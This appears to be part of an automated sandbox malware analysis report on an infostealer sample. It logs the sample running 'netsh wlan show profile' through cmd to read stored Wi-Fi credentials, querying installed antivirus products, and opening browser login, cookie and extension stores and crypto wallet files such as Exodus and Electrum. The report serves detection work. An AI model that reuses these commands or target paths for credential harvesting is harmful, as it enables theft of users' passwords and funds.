                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\tree.comQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeQueries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
                      Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeQueries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeQueries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeQueries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeQueries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\word.exeQueries volume information: C:\Users\user\AppData\Roaming\word.exe VolumeInformation
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF64487D010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_00007FF64487D010
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeCode function: 0_2_00007FF644895E7C _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,0_2_00007FF644895E7C
                      Source: C:\Users\user\AppData\Local\Temp\_MEI58162\rar.exeCode function: 84_2_00007FF71F0D48CC GetModuleFileNameW,GetVersionExW,LoadLibraryExW,LoadLibraryW,84_2_00007FF71F0D48CC
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Lowering of HIPS / PFW / Operating System Security Settings

                      barindex
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                      Source: bound.exe, 0000000F.00000002.4236005935.000000001BEF3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Users\user\AppData\Local\Temp\bound.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                      Source: C:\Windows\System32\wbem\WMIC.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 00000000.00000003.1761043255.000001D372114000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000003.1761043255.000001D372112000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1783258664.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1782846759.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.2189594546.00000281ABC20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1783075658.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1782963753.00000281ABA90000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 5816, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\_MEI58162\rarreg.key, type: DROPPED
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bound.exe PID: 7280, type: MEMORYSTR
                      Source: Yara matchFile source: 15.0.bound.exe.2f0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000003.1823342722.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1833375883.00000281AC037000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000002.4216648760.0000000002617000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000F.00000000.1789335378.00000000002F2000.00000002.00000001.01000000.00000013.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000003.1813675437.00000281AC033000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: sB2ClgrGng.exe PID: 2892, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: bound.exe PID: 7280, type: MEMORYSTR
                      Source: Yara matchFile source: C:\Users\user\AppData\Roaming\word.exe, type: DROPPED
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Electrum
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Jaxxz
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Exodusz
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: sB2ClgrGng.exe, 00000001.00000003.1783370880.00000281ABA90000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrialsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_storeJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web ApplicationsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\03a1fc40-7474-4824-8fa1-eaa75003e98aJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StorageJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.defaultJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\StorageJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCacheJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_storeJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\NetworkJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension SettingsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-releaseJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\bde1cb97-a9f1-4568-9626-b993438e38e1Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\fccd7e85-a1ff-4466-9ff5-c20d62f6e0a2Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhiJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\content-prefs.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloadsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension RulesJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\4d5b179f-bba0-432a-b376-b1fb347ae64fJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\8ad0d94c-ca05-4c9d-8177-48569175e875Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDBJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session StorageJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\DefaultJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync DataJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\protections.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\5bc1a347-c482-475c-a573-03c10998aeeaJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\permissions.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.logJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM StoreJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App SettingsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation PlatformJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\favicons.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download ServiceJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension ScriptsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabaseJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\webappsstore.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics DatabaseJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorageJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDBJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code CacheJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasmJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldbJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databasesJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDBJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDBJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabaseJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\FilesJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\57328c1e-640f-4b62-a5a0-06d479b676c2Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension SettingsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_dbJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\ls-archive.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement TrackerJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storageJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension StateJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dirJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\jsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\2cb4572a-4cab-4e12-9740-762c0a50285fJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dirJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_dbJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.logJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CacheJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\EncryptionJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCacheJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_dbJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_prediction_model_downloads\e8d04e65-de13-4e7d-b232-291855cace25Jump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDBJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldbJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                      Source: C:\Users\user\Desktop\sB2ClgrGng.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
